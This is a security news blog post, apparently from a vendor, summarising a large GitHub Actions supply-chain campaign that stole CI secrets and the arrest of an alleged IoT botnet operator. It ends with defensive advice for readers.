GitHub's 6-Hour Repo Bloodbath 🦈 and a 30 Tbps Botnet Bust 🚨
Two stories grabbed the security world's attention today: one of the largest GitHub supply-chain attacks ever recorded, and the takedown of a botnet operator behind record-breaking 30 Tbps DDoS strikes. Here's what happened and why it matters.
GitHub's Six-Hour Nightmare: 5,561 Repos Backdoored in a Single Afternoon
An automated campaign dubbed "Megalodon" pushed 5,718 malicious commits into 5,561 GitHub repositories in just six hours, sneaking hidden code into the GitHub Actions workflows that those projects use to build and release software. The payloads quietly siphon CI secrets, cloud credentials, SSH keys, and OIDC tokens out to an attacker-controlled server, and the worst variants leave behind dormant backdoors that an attacker can trigger later without any visible build activity. The campaign already cascaded into npm, poisoning multiple released versions of a popular package and putting every downstream user of those builds at risk.
Why should you care, even if you don't write code? Software supply-chain attacks like this are how attackers reach millions of people at once — the apps and services your business relies on are built on top of repositories like these, and a single compromised build pipeline can quietly push malware into widely-used products. If your team uses GitHub Actions, today is a good day to audit recent commits, rotate any CI secrets, and review cloud audit logs for unfamiliar token requests.
The 30 Tbps Botnet Kingpin Has Been Cuffed
A 23-year-old known online as "Dort" was arrested in Ottawa on a U.S. extradition warrant for allegedly running Kimwolf, an Internet-of-Things botnet that turned hijacked photo frames and webcams into a weapon capable of launching record-setting 30 Tbps DDoS attacks. Investigators say the network issued more than 25,000 attack commands, hit U.S. Department of Defense targets, and racked up over a million dollars in damages per victim — and that the operator orchestrated swatting attacks against a researcher who exposed the IoT flaw Kimwolf exploited. Authorities also seized infrastructure for three competing botnets and shut down nearly 50 DDoS-for-hire services in a coordinated international sweep.
Two big takeaways for everyone: cheap connected devices in your home or office (cameras, smart frames, sensors) are still favorite recruits for botnets, so keep firmware updated and isolate them on a separate network. And the era of "DDoS-for-hire" services treating attacks like a paid utility is increasingly running into serious law enforcement attention — a welcome shift for any business that has ever been knocked offline.
Stay ahead of threats with GOCO Security at gocosecurity.com.
.jpg)
Comments
Post a Comment